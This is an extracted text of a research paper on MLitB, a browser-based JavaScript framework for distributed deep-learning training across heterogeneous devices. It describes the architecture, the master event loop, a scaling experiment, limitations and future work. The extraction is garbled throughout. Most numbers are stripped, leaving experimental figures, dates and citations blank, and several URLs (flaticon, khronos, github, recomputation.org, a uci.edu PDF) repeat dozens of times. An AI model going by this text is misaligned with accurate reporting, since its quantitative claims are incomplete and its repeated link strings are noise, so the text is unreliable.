.org/tr/xmlhttprequest http://www.w .org/tr/xmlhttprequest http://www.w .org/tr/xmlhttprequest http://www.w .org/tr/xmlhttprequest http://www.w .org/tr/xmlhttprequest http://dx.doi.org/ . /peerj-cs. problems/projects simultaneously along with all clients’ connections. all processes within the master are event-driven, triggered by actions of the slave nodes. calling the appropriate functions by slave nodes to the master node is handled by the router. the master must efficiently perform its tasks (data reallocation and distribution, reduce-steps) because the clients are idle awaiting new parameters before their next work cycle. new clients must also wait until the end of an iteration before joining a network. the mlitb network is dynamic and permits slave nodes to join and leave during processing. the master monitors its connections and is able to detect lost participants. when this occurs, data that was allocated to the lost client is re-allocated the remaining clients, if possible, otherwise it is marked as to be allocated. data server the data server is a bespoke application intended to work with our neural network use-case model and can be thought of a lightweight replacement for a proper image database. the data server is an independent node.js application that can, but does not necessarily live on the same machine. users upload data in zip files before training begins; currently, the data server handles zipped image classification datasets (where sub-directory names define class labels). data is then downloaded from the data server and zipped files are sent to clients using xhr and unzipped and processed locally. xhr is used instead of websockets because they communicate large zip-files more efficiently. a redundant cache of data is stored locally in the clients’ browser’s memory. for example, a client may store , data vectors, but at each iteration it may only have the computational power to process data vectors in its scheduled iteration duration. the data server uses specialized javascript apis unzip.js and redis-server. clients clients are browser connections from heterogeneous devices that visit the master server’s url. clients interact through a ui worker, called a boss, and can create slave workers to perform various tasks (see workers). the boss is the main worker running in a client’s browser. it manages the slave and image download worker and functions as a bridge between the downloader and slaves. a simple wrapper handles ui interactions, and provides input/output to the boss. client bosses use a data worker to download data from the data server using xhr. the data worker and server communicate using xhr and pass zip files in both directions. the boss handles unzipping and decoding data for slaves that request data. clients therefore require no software installation other than its native browser. clients can contribute to any project hosted by the master server. clients can trigger several events through the ui worker. these include adjusting hyper-parameters, adding data, and adding slave workers, etc. (fig. ). most tasks are run in a separate web worker thread (including the boss), ensuring a non-blocking and responsive client ui. data downloading is a special task that, via the boss and the data worker, uses xhr to download from the data server. meeds et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure mlitb client workers. each client connection to the master server initiates a ui worker, also known as a boss. for uploading data from a client to the data server and for downloading data from the data server to a client, a separate web worker called the data worker is used. users can add slaves through the ui worker; each slave performs a separate task using a web worker. icon made by freepik from www. flaticon.com. workers in fig. the tasks implemented using web worker threads are shown. at the highest-level is the client ui, with which the user interacts with ml problems and controls their slave workers. from the client ui, a user can create a new project, load a project from file, upload data to a project, or add slave workers for a project. slaves can perform several tasks; most important is the trainer, which connects to an event loop of a ml project and contributes to its computation (i.e., its map step). each slave worker communicates directly to the master server using web sockets. for the latter three tasks, the communication is mainly for sending requests for models parameters and receiving them. the training slave has more complicated behavior because it must download data then perform computation meeds et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://dx.doi.org/ . /peerj-cs. as part of the main event loop. to begin training, the user sets the slave task to train and selects start/restart. this will trigger a join event at the master server; model parameters and data will be downloaded and the slave will begin computation upon completion of the data download. the user can remove a slave at any time. other slave tasks are tracking, which requires receiving model parameters from the master, and allows users to monitor statistics of the model on a dataset (e.g., classification error) or to execute the model (e.g., classify an image on a mobile device). each slave worker communicates directly to the master server using web sockets. events and software behavior the mlitb network is constructed as a master–slave relationship, with one server and multiple slave nodes (clients). the setup for computation is similar to a mapreduce network (dean & ghemawat, ); however, the master server performs many tasks during an iteration of the master event loop, including a reduce step, but also several other important tasks. the specific tasks will be dictated by events triggered by the client, such as requests for parameters, new client workers, removed/lost clients, etc. our master event loop can be considered as a synchronized map-reduce algorithm with a user defined iteration duration t, where values of t may range from to s, depending on the size of the network and the problem. mlitb is not limited to a map-reduce paradigm and in fact we believe that our framework opens the door to peer-to-peer or gossip algorithms (boyd et al., ). we are currently developing asynchronous algorithms to improve the scalability of mlitb. master event loop the master event loop consists of five steps and is executed by the master server node as long there is at least one slave node connected. each loop includes one map-reduce step, and runs for at least t seconds. the following steps are executed, in order: (a) new data uploading and allocation. (b) new client trainer initialization and data allocation. (c) training workers reduce step. (d) latency monitoring and data allocation adjustment. (e) master broadcasts parameters. (a) new data uploading and allocation when a client boss uploads data, it directly communicates with the data server using xhr. once the data server has uploaded the zip file, it sends the data indices and classification labels to the boss. the boss then registers the indices with the master server. each data index is managed: mlitb stores an allocated index (the worker that is allocated the id) and a cached index (the worker that has cached the id). the master ensures that the data allocation is balanced amongst its clients. once a data set is allocated on the master server, the master allocates indices and sends the set of ids to workers. workers can then request data from the boss, who in turn use its data downloader worker to download those worker meeds et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. specific ids from the data server. the data server sends a zipped file to the data downloader, which are then unzipped and processed by the boss (e.g., jpeg decoding for images). the zip file transfers are fast but the decoding can be slow. we therefore allow workers to begin computing before the entire dataset is downloaded and decoded, allowing projects to start training almost immediately while data gets cached in the background. (b) new client trainer initialization and data allocation when a client boss adds a new slave, a request to join the project is sent to the master. if there is unallocated data, a balanced fraction of the data is allocated to the new worker. if there is no unallocated data, a pie-cutter algorithm is used to remove allocated data from other clients and assign it to the new client. this prevents unnecessary data transfers. the new worker is sent a set of data ids it will need to download from the client’s data worker. once the data has been downloaded and put into the new worker’s cache, the master will then add the new worker to the computation performed at each iteration. the master server is immediately informed when a client or one of its workers is removed from the network. because of this, it can manage the newly unallocated data (that were allocated to if a user closes a client tab, the master will know immediately and take action. in the current implementation, if a user closes the master tab, all current connections are lost. the lost client). (c) training workers’ reduce step the reduce step is completely problem specific. in our prototype, workers compute gradients with respect to model parameters over their allocated data vectors, and the reduce step sums over the gradients and updates the model parameters. (d) latency monitoring and data allocation adjustment the interval t represents both the time of computation and the latency between the client and the master node. the synchronization is stochastic and adaptive. at each reduce step, the master node estimates the latency between the client and the master and informs the client worker how long it should run for. a client does not need to have a batch size because it just clocks its own computation and returns results at the end of its scheduled work time. under this setting, it is possible to have mobile devices that compute only a few gradients per second and a powerful desktop machine that performs hundreds or thousands. this simple approach also allows the master to account for unexpected user activity: if the user’s device slows or has increased latency, the master will decrease the load on the device for the next iteration. generally, devices with a cellular network connection communicate with longer delays than hardwired machines. in practice, this means the reduction step in the master node receives delayed responses from slave nodes, forcing it to run the reduction function after the slowest slave node (with largest latency) has returned. this is called asynchronous reduction callback delay. (e) master broadcasts parameters an array of model parameters is broadcast to each clients’ boss worker using xhr; when the boss receives new parameters, they are given to each of its workers who then start another computation iteration. meeds et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. ml use-case: deep neural networks the current version of the mlitb software is built around a pervasive ml use-case: deep neural networks (dnns). dnns are the current state-of-the-art prediction models for many tasks, including computer vision (krizhevsky, sutskever & hinton, ; lin, chen & yan, ), speech recognition (hinton et al., ), and natural language processing and machine translation (liu et al., ; bahdanau, cho & bengio, ; sutskever, vinyals & le, ). our implementation only required superficial modifications to an existing javascript implementation (karpathy, ) to fit into our network design. scaling behavior of mlitb we performed an experiment to study the scaling behavior of mlitb prototype. using up to -core workstation machines connected on a local area network using a single router, we trained a simple convolutional nn on the mnist dataset for iterations (with seconds per iteration/synchronization event). the number of slave nodes doubled from slave node specifications ( units): intel core i - . ghz (dual-core); gb ram; windows enterprise x ; google chrome . master node specifications ( unit): intel xeon e . ghz (quad-core); gb ram; ubuntu . lts. nodejs version: v . . . the nn has a × input layer connected to convolution filters (with pooling), followed by a fully connected output layer. one experiment to the next (i.e., , , ,..., ). we are interested in the scaling behavior of two performance indicators: ( ) power, measured in data vectors processed per second, and ( ) latency in milliseconds between slaves and master node. of secondary interest is the generalization performance on the mnist test set. as a feasibility study of a distributed ml framework, we are most interested scaling power while minimizing latency effects during training, but we also want to ensure the correctness of the training algorithm. since optimization using compiled js and/or gpus of the ml javascript library possible, but not our focus, we are less concerned with the power performance of a single slave node. results for power and latency are shown in fig. . power increases linearly up to slave nodes, at which point a large increase in latency limits additional power gains for new nodes. this is due to a single server reaching the limit of its capacity to process incoming gradients synchronously. solutions include using multiple server processes, asynchronous updates, and partial gradient communication. test error, as a function of the number of nodes is shown in fig. after iterations ( s) and iterations ( s); i.e., each point represents the same wall-clock computation time. this demonstrates the correctness of mlitb for a given model architecture and learning hyperparameters. due to the data allocation policy that limits the data vector capacity of each node to , vectors, experiments with more nodes process more of the training set during the training procedure. for example, using only slave node trains on / of the full training set. with nodes, the network is training on the full dataset. this policy could easily be modified to include data refreshment when running with unallocated data. the primary latency issue is due to all clients simultaneously sending gradients to the server at the end of each iteration. three simple scaling solutions are ( ) increasing the number of master node processes that receive gradients ( ) using asynchronous update rules (each slave computes for a random amount of time, then sends updates), reducing the load of any one master node process, and ( ) partial communication of gradients (decreasing bandwidth). meeds et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure effects of scaling on power and latency. power—measured as the number of data vectors processed per second—scales linearly until nodes, when the increase in latency jumps. the ideal linear scaling is shown in grey. figure effects of scaling on optimization convergence of the nn is measured in terms of test error after and iterations. each point represents approximately the same wall-clock time ( / s for and iterations, respectively). meeds et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure cifar- project loaded in mlitb. walk-through of mlitb prototype we briefly describe how mlitb works from a researcher’s point of view. specification of neural network and training parameters using a minimalist ui (not shown), the researcher can specify their neural network, for example they can add/remove layers of different types, and adjust regularization parameters (l /l /dropout) and learning rates. alternatively, the researcher can load a previously saved neural network in json format (that may or may not have already been trained). once a nn is specified (or loaded), it appears in the display, along with other neural networks also managed by the master node. by selecting a specific neural network, the researcher can then add workers and data (e.g., project cifar in fig. ). specification of training data image classification data is simple to upload using named directory structures for image labels. for example, for cifar all files in the “apple” subdirectory will be given label “ap- ple” once loaded (e.g., the image file /cifar /apple/apple apple s .png). the entire “cifar ” directory can be zipped and uploaded. mlitb processes jpeg and png formats. a test set can be uploaded in tracker mode. training mode in the training mode, a training worker performs as many gradient computations as possible within the iteration duration t (i.e., during the map step of the main event loop). the total gradient and the number of gradients is sent to the master, which then in the reduce step computes a weighted average of gradients from all workers and takes a gradient step using adagrad (duchi, hazan & singer, ). at the end of the main event loop, new neural network weights are sent via web sockets to both trainer workers (for the next meeds et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure tracking model (model execution). the label of a test image is predicted using the latest nn parameters. users can execute a nn prediction using an image stored on their device or using their device’s camera. in this example, an image of a horse is correctly predicted with probability . (the class-conditional predictive probability). gradient computations) and to tracker workers (for computing statistics and executing the latest model). tracking mode there are two possible functions in tracking mode: ( ) executing the neural network on test data, and ( ) monitoring classification error on an independent data set. for , users can predict class labels for images taken with a device’s camera or locally stored images. users can also learn a new classification problem on the fly by taking a picture and giving it a new label; this is treated as a new data vector and a new output neuron is added dynamically to the neural network if the label is also new. figure shows a test image being classified by the cifar trained neural network. for , users create a statistics worker and can upload test images and track their error over time; after each complete evaluation of the test images, the latest neural network received from the master is used. fig. shows the error for cifar using a small test set for the first parameter updates. archiving trained neural network model the prototype does not include a research closure specification. however, it does provide easy archiving functionality. at any moment, users can download the entire model speci- fication and current parameter values in json format. users can then share or initialize a new training session with the json object by uploading it during the model specification phase, which represents a high-level of reproducibility. although the json object fully specifies the model, it does not include training or testing code. despite this shortcoming, using a standard protocol is simple way of providing a lightweight archiving system. meeds et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure tracking mode (classification error). a test dataset can be loaded and its classification error rate tracked over iterations; here using a nn trained on cifar- . limitations of mlitb prototype in this section we briefly discuss the limitations of the current prototype; later in section ‘opportunities and challenges’ we will discuss the challenges we face in scaling mlitb to a massive level. our scaling experiment demonstrates that the mlitb prototype can accommodate up to clients before latency significantly degrades its performance. latency, however, is primarily affected by the length of an iteration and by size of the neural network. for longer iterations, latency will become a smaller portion of the main event loop. for very large neural networks, latency will increase due to bandwidth pressure. as discussed previously, the main computational efficiency loss is due to the synchro- nization requirement of the master event loop. this requirement causes the master server to be idle while the clients are computing and the clients to wait while the master processes all the gradients. as the size of the full gradients can be large (at least > mb for small neural networks), the network bandwidth is quickly saturated at the end of a computation iteration and during the parameter broadcast. by changing to an asynchronous model, the master can continuously process gradients and the bandwidth can be maximally utilized. by communicating partial gradients, further efficiency can be attained. we leave this for future work. there is a theoretical limit of mb data storage per client (the viable memory of a web-browser). in our experience, the practical limit is closer to mb at which point performance is lost due to memory management issues. we found that mb/s bandwidth was achievable on a local network, which meant that it could handle images on mnist and cifar- easily, but would stall for larger images. with respect to deep neural networks, the data processing ability of a single node was limited (especially is one compared meeds et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. to sophisticated gpu enables libraries (bastien et al., )). although we were most interested in the scaling performance, we note that naive convolution implementations significantly slow performance. we found that reasonable sized images, up to × × pixels, can be processed on mobile devices in less than a second without convolutions, but can take several seconds with convolutions, limiting its usefulness. in the future, near native or better implementations will be required for the convolutional layers. related work mlitb has been influenced by a several different technologies and ideas presented by previous authors and from work in different specialization areas. we briefly summarize this related work below. volunteer computing boinc (anderson, ) is an open-source software library used to set up a grid computing network, allowing anyone with a desktop computer connected to the internet to participate in computation; this is called public resource computing. public resource or volunteer computing was popularized by seti@home (anderson et al., ), a research project that analyzes radio signals from space in the search of signs of extraterrestrial intelligence. more recently, protein folding has emerged as significant success story (lane et al., ). hadoop (shvachko et al., ) is an open-source software system for storing very large datasets and executing user application tasks on large networks of computers. mapreduce (dean & ghemawat, ) is a general solution for performing computation on large datasets using computer clusters. javascript applications in (cushing et al., ) a network of distributed web-browsers called weevilscout is used for complex computation (regular expression matching and binary tree modifications) using a javascript engine. it uses similar technology (web workers and web sockets) as mlitb. convnetjs (karpathy, ) is a javascript implementation of a convolutional neural-network, developed primarily for educational purposes, which is capable of building diverse neural networks to run in a single web browser and trained using stochastic gradient descent; it can be seen as the non-distributed predecessor of mlitb. distributed machine learning the most performant deep neural network models are trained with sophisticated scientific libraries written for gpus (bergstra et al., ; jia et al., ; collobert, kavukcuoglu & farabet, ) that provide orders of magnitude computational speed-ups compared to cpus. each implements some form of stochastic gradient descent (sgd) (bottou, ) as the training algorithm. most implementations are limited to running on the cores of a single machine and by extension the memory limitations of the gpu. exceptionally, there are distributed deep learning algorithms that use a farm of gpus (e.g., downpour sgd (dean et al., )) and farms of commodity servers (e.g., cots-hps (coates et al., )). other distributed ml algorithm research includes the parameter server model (li meeds et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. et al., ), parallelized sgd (zinkevich et al., ), and distributed sgd (ahn, shahbaba & welling, ). mlitb could potentially push commodity computing to the extreme using pre-existing devices, some of which may be gpu capable, with and without an organization’s existing computing infrastructure. as we discuss below, there are still many open research questions and opportunities for distributed ml algorithm research. opportunities and challenges in tandem with our vision, there are several directions the next version of mlitb can take, both in terms of the library itself and the potential kinds of applications a ubiquitous ml framework like mlitb can offer. we first focus on the engineering and research challenges we have discovered during the development of our prototype, along with some we expect as the project grows. second, we look at the opportunities mlitb provides, not only based on the research directions the challenges uncovered, but also novel application areas that are perfect fits for mlitb. in section ‘future mlitb development’ we preview the next concrete steps in mlitb development. challenges we have identified three keys engineering and research challenges that must be overcome for mlitb to achieve its vision of learning models a global scale. memory limitations state-of-the-art neural network models have huge numbers of parameters. this prevents them from fitting onto mobile devices. there are two possible solutions to this problem. the first solution is to learn or use smaller neural networks. smaller nn models have shown promise on image classification performance, in particular the network in network (lin, chen & yan, ) model from the caffe model zoo, is mb, and outperforms alexnet which is mb (jia et al., ). it is also possible to first train a deep neural network then use it to train a much smaller, shallow neural network (ba & caruana, ). another solution is to distribute the nn (during training and prediction) across clients. an example of this approach is downpour sgd (dean et al., ). communication overhead with large models, large of numbers of parameters are communicated regularly. this is a similar issue to memory limitation and could benefit from the same solutions. however, given a fixed bandwidth and asynchronous parameter updates, we can ask what parameter updates (from master to client) and which gradients (from client to master) should be communicated. an algorithm could transmit a random subset of the weight gradients, or send the most informative. in other words, given a fixed bandwidth budget, we want to maximize the information transferred per iteration. performance efficiency perhaps the biggest argument against scientific computing with javascript is its computation performance. we disagree that this should prevent the widespread adoption of browser-based, scientific computing because the goal of several groups to achieve native meeds et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. performance in javascript (chrome v , ; asm.js, ) and gpu kernels are becoming part of existing web engines (e.g., webcl by kronos: www.khronos.org/webcl) and they can be seamlessly incorporated into existing javascript libraries, though they have yet to be written for ml. opportunities massively distributed learning algorithms the challenges just presented are obvious areas of future distributed machine learning research (and are currently being developed for the next version of mlitb). perhaps more interesting is, at a higher level, that the mlitb vision raises novel questions about what it means to train models on a global scale. for instance, what does it mean for a model to be trained across a global internet of heterogeneous and unreliable devices? is there a single model or a continuum of models that are consistent locally, but different from one region to another? how should a model adapt over long periods of time? these are largely untapped research areas for ml. field research moving data collection and predictive models onto mobile devices makes is easy to bring models into the field. connecting users with mobile devices to powerful nn models can aid field research by bringing the predictive models to the field, e.g., for fast labeling and data gathering. for example, a pilot program of crop surveillance in uganda currently uses bespoke computer vision models for detecting pestilence (insect eggs, leaf diseases, etc.) (quinn, leyton-brown & mwebaze, ). projects like these could leverage publicly available, state-of-the-art computer vision models to bootstrap their field research. privacy preserving computing and mobile health our mlitb framework provides a natural platform for the development of real privacy- preserving application (dwork, ) by naturally protecting user information contained on mobile devices, yet allowing the data to be used for valuable model development. the current version of mlitb does not provide privacy preserving algorithms such as (han et al., ), but these could be easily incorporated into mlitb. it would therefore be possible for a collection of personal devices to collaboratively train machine learning models using sensitive data stored locally and with modified training algorithms that guarantee privacy. one could imagine, for example, using privately stored images of a skin disease to build a classifier based on large collection of disease exemplars, yet with the data always kept on each patient’s mobile device, thus never shared, and trained using privacy preserving algorithms. green computing one of our main objectives was to provide simple, cheap, distributed computing capability with mlitb. because mlitb runs with minimal software installation (in most cases requiring none), it is possible to use this framework for low-power consumption distributed computing. by using existing organizational resources running in low-energy states (dormant or near dormant) mlitb can wake the machines, perform some meeds et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://www.khronos.org/webcl http://www.khronos.org/webcl http://www.khronos.org/webcl http://www.khronos.org/webcl http://www.khronos.org/webcl http://www.khronos.org/webcl http://www.khronos.org/webcl http://www.khronos.org/webcl http://www.khronos.org/webcl http://www.khronos.org/webcl http://www.khronos.org/webcl http://www.khronos.org/webcl http://www.khronos.org/webcl http://www.khronos.org/webcl http://www.khronos.org/webcl http://www.khronos.org/webcl http://www.khronos.org/webcl http://www.khronos.org/webcl http://www.khronos.org/webcl http://www.khronos.org/webcl http://www.khronos.org/webcl http://dx.doi.org/ . /peerj-cs. computing cycles, and return them to their low-energy states. this is in stark contrast to a data center approach which has near constant, heavy energy usage (natural resources defense council, ). future mlitb development the next phases of development will focus on the following directions: a visual program- ming user interface for model configuration, development of a library of ml models and algorithms, development of performant scientific libraries in javascript with and without gpus, and model archiving with the development of a research closure specification. visual programming many ml models are constructed as chains of processing modules. this lends itself to a visual programming paradigm, where the chains can be constructed by dragging and dropping modules together. this way models can be visualized and compared, dissected, etc. algorithms are tightly coupled to the model and a visual representation of the model can allow interaction with the algorithm as it proceeds. for example, learning rates for each layer of a neural network can be adjusted while monitoring error rates (even turned off for certain layers), or training modules can be added to improve learning of hidden layers for very deep neural networks, as done in szegedy et al. ( ). with a visual ui it would be easy to pull in other existing, pre-trained models, remove parts, and train on new data. for example, a researcher could start with a pre-trained image classifier, remove the last layer, and easily train a new image classifier, taking advantage of an existing, generalized image representation model. machine learning library we currently have built a prototype around an existing javascript implementation of dnns (karpathy, ). in the near future we plan on implementing other models (e.g., la- tent dirichlet allocation) and algorithms (e.g., distributed mcmc (ahn, shahbaba & welling, )). mlitb is agnostic to learning algorithms and therefore is a great platform for researching novel distributed learning algorithms. to do this, however, mlitb will need to completely separate machine learning model components from the mlitb network. at the moment, the prototype is closely tied to its neural network use-case. once separated, it will be possible for external modules to be added by the open-source community. gpu implementations implementation of gpu kernels can bring mlitb performance up to the level of current state-of-the-art scientific libraries such as theano (bergstra et al., ; bastien et al., ) and caffe (jia et al., ), while retaining the advantages of using heterogeneous devices. for example, balancing computational loads during training is very simple in mlitb and any learning algorithm can be shared by gpu powered desktops and mobile devices. smart phones could be part of the distributed computing process by permitting the training algorithms to use short bursts of gpu power for their calculations, and therefore limiting battery drain and user disruption. meeds et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. design of research closures mlitb can save and load json model configurations and parameters, allowing researchers to share and build upon other researchers’ work. however, it does not quite achieve our goal of a research closure where all aspects—code, configuration, parameters, etc—are saved into a single object. in addition to research closures, we hope to develop a model zoo, akin to caffe’s for posting and sharing research. finally, some kind of system for verifying models, like recomputation.org, would further strengthen the case for mlitb being truly reproducible (and provide backwards compatibility). conclusion in this paper we have introduced mlitb: machine learning in the browser, an alternative framework for ml research based entirely on using the browser as the computational engine. the mlitb vision is based upon the overarching objectives that provide ubiquitous ml capability to every computing device, cheap distributed computing, and reproducible research. the mlitb prototype is written entirely in javascript and makes extensive use of existing javascript libraries, including node.js for servers, web workers for non-blocking computation, and web sockets for communication between clients and servers. we demonstrated the potential of mlitb on a ml use-case: deep neural networks trained with distributed stochastic gradient descent using heterogenous devices, including dedicated grid-computing resources and mobile devices, using the same interface and with no client-side software installation. clients simply connect to the server and computing begins. this use-case has provided valuable information for future versions of mlitb, exposing both existing challenges and interesting research and application opportunities. we have also advocated for a framework which supports reproducible research; mlitb naturally provides this by allowing models and parameters to be saved to a single object which can be reloaded and used by other researchers immediately. additional information and declarations funding the authors acknowledge funding support from amsterdam data science and computing resources from surfsara. m welling acknowledges support from facebook, google, and yahoo. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: surfsara. facebook. google. yahoo. meeds et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ file:www.recomputation.org file:www.recomputation.org file:www.recomputation.org file:www.recomputation.org file:www.recomputation.org file:www.recomputation.org file:www.recomputation.org file:www.recomputation.org file:www.recomputation.org file:www.recomputation.org file:www.recomputation.org file:www.recomputation.org file:www.recomputation.org file:www.recomputation.org file:www.recomputation.org file:www.recomputation.org file:www.recomputation.org http://dx.doi.org/ . /peerj-cs. competing interests the authors declare there are no competing interests. author contributions • edward meeds conceived and designed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, reviewed drafts of the paper. • remco hendriks conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, performed the computation work, reviewed drafts of the paper. • said al faraby conceived and designed the experiments, performed the experiments, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work. • magiel bruntink and max welling wrote the paper, reviewed drafts of the paper. data availability the following information was supplied regarding the deposition of related data: github: github.com/software-engineering-amsterdam/mlitb. references ahn s, shahbaba b, welling m. . distributed stochastic gradient mcmc. in: proceedings of the st international conference on machine learning (icml- ), – . available at http:// www.ics.uci.edu/∼babaks/site/home files/icml ahn.pdf. anderson dp. . boinc: a system for public-resource computing and storage. in: proceedings of the workshop on grid computing. piscataway: ieee, – . anderson dp, cobb j, korpela e, lebofsky m, werthimer d. . seti@home: an experiment in public- resource computing. communications of the acm ( ): – doi . / . . asm.js. . asm.js: an extraordinarily optimizable, low-level subset of javascript. available at http://asmjs.org (accessed november ). ba j, caruana r. . do deep nets really need to be deep? in: advances in neural information processing systems, – . available at http://papers.nips.cc/paper/ -do-deep-nets-really-need-to-be-deep. bahdanau d, cho k, bengio y. . neural machine translation by jointly learning to align and translate. arxiv preprint. arxiv: . . bastien f, lamblin p, pascanu r, bergstra j, goodfellow i, bergeron a, bouchard n, warde-farley d, bengio y. . theano: new features and speed improvements. arxiv preprint. arxiv: . . begoli e, horey j. . design principles for effective knowledge discovery from big data. in: software architecture (wicsa) and european conference on software architecture (ecsa), joint working ieee/ifip conference on. piscataway: ieee, – . bergstra j, breuleux o, bastien f, lamblin p, pascanu r, desjardins g, turian j, warde-farley d, bengio y. . theano: a cpu and gpu math expression compiler. in: proceedings of the python for scientific computing conference (scipy). oral presentation. available at http://www.iro.umontreal.ca/∼lisa/pointeurs/theano scipy .pdf. meeds et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://www.github.com/software-engineering-amsterdam/mlitb http://www.github.com/software-engineering-amsterdam/mlitb http://www.github.com/software-engineering-amsterdam/mlitb http://www.github.com/software-engineering-amsterdam/mlitb http://www.github.com/software-engineering-amsterdam/mlitb http://www.github.com/software-engineering-amsterdam/mlitb http://www.github.com/software-engineering-amsterdam/mlitb http://www.github.com/software-engineering-amsterdam/mlitb http://www.github.com/software-engineering-amsterdam/mlitb http://www.github.com/software-engineering-amsterdam/mlitb http://www.github.com/software-engineering-amsterdam/mlitb http://www.github.com/software-engineering-amsterdam/mlitb http://www.github.com/software-engineering-amsterdam/mlitb http://www.github.com/software-engineering-amsterdam/mlitb http://www.github.com/software-engineering-amsterdam/mlitb http://www.github.com/software-engineering-amsterdam/mlitb http://www.github.com/software-engineering-amsterdam/mlitb http://www.github.com/software-engineering-amsterdam/mlitb http://www.github.com/software-engineering-amsterdam/mlitb http://www.github.com/software-engineering-amsterdam/mlitb http://www.github.com/software-engineering-amsterdam/mlitb http://www.github.com/software-engineering-amsterdam/mlitb http://www.github.com/software-engineering-amsterdam/mlitb http://www.github.com/software-engineering-amsterdam/mlitb http://www.github.com/software-engineering-amsterdam/mlitb http://www.github.com/software-engineering-amsterdam/mlitb http://www.github.com/software-engineering-amsterdam/mlitb http://www.github.com/software-engineering-amsterdam/mlitb http://www.github.com/software-engineering-amsterdam/mlitb http://www.github.com/software-engineering-amsterdam/mlitb http://www.github.com/software-engineering-amsterdam/mlitb http://www.github.com/software-engineering-amsterdam/mlitb http://www.github.com/software-engineering-amsterdam/mlitb http://www.github.com/software-engineering-amsterdam/mlitb http://www.github.com/software-engineering-amsterdam/mlitb http://www.github.com/software-engineering-amsterdam/mlitb http://www.github.com/software-engineering-amsterdam/mlitb http://www.github.com/software-engineering-amsterdam/mlitb http://www.github.com/software-engineering-amsterdam/mlitb http://www.github.com/software-engineering-amsterdam/mlitb http://www.github.com/software-engineering-amsterdam/mlitb http://www.github.com/software-engineering-amsterdam/mlitb http://www.github.com/software-engineering-amsterdam/mlitb http://www.github.com/software-engineering-amsterdam/mlitb http://www.github.com/software-engineering-amsterdam/mlitb http://www.github.com/software-engineering-amsterdam/mlitb http://www.github.com/software-engineering-amsterdam/mlitb http://www.ics.uci.edu/~babaks/site/home_files/icml _ahn.pdf http://www.ics.uci.edu/~babaks/site/home_files/icml _ahn.pdf http://www.ics.uci.edu/~babaks/site/home_files/icml _ahn.pdf http://www.ics.uci.edu/~babaks/site/home_files/icml _ahn.pdf http://www.ics.uci.edu/~babaks/site/home_files/icml _ahn.pdf http://www.ics.uci.edu/~babaks/site/home_files/icml _ahn.pdf http://www.ics.uci.edu/~babaks/site/home_files/icml _ahn.pdf http://www.ics.uci.edu/~babaks/site/home_files/icml _ahn.pdf http://www.ics.uci.edu/~babaks/site/home_files/icml _ahn.pdf http://www.ics.uci.edu/~babaks/site/home_files/icml _ahn.pdf http://www.ics.uci.edu/~babaks/site/home_files/icml _ahn.pdf http://www.ics.uci.edu/~babaks/site/home_files/icml _ahn.pdf http://www.ics.uci.edu/~babaks/site/home_files/icml _ahn.pdf http://www.ics.uci.edu/~babaks/site/home_files/icml _ahn.pdf http://www.ics.uci.edu/~babaks/site/home_files/icml _ahn.pdf http://www.ics.uci.edu/~babaks/site/home_files/icml _ahn.pdf http://www.ics.uci.edu/~babaks/site/home_files/icml _ahn.pdf http://www.ics.uci.edu/~babaks/site/home_files/icml _ahn.pdf http://www.ics.uci.edu/~babaks/site/home_files/icml _ahn.pdf http://www.ics.uci.edu/~babaks/site/home_files/icml _ahn.pdf http://www.ics.uci.edu/~babaks/site/home_files/icml _ahn.pdf http://www.ics.uci.edu/~babaks/site/home_files/icml _ahn.pdf http://www.ics.uci.edu/~babaks/site/home_files/icml _ahn.pdf http://www.ics.uci.edu/~babaks/site/home_files/icml _ahn.pdf http://www.ics.uci.edu/~babaks/site/home_files/icml _ahn.pdf http://www.ics.uci.edu/~babaks/site/home_files/icml _ahn.pdf http://www.ics.uci.edu/~babaks/site/home_files/icml _ahn.pdf http://www.ics.uci.edu/~babaks/site/home_files/icml _ahn.pdf http://www.ics.uci.edu/~babaks/site/home_files/icml _ahn.pdf http://www.ics.uci.edu/~babaks/site/home_files/icml _ahn.pdf http://www.ics.uci.edu/~babaks/site/home_files/icml _ahn.pdf http://www.ics.uci.edu/~babaks/site/home_files/icml _ahn.pdf http://www.ics.uci.edu/~babaks/site/home_files/icml _ahn.pdf http://www.ics.uci.edu/~babaks/site/home_files/icml _ahn.pdf http://www.ics.uci.edu/~babaks/site/home_files/icml _ahn.pdf http://www.ics.uci.edu/~babaks/site/home_files/icml _ahn.pdf http://www.ics.uci.edu/~babaks/site/home_files/icml _ahn.pdf 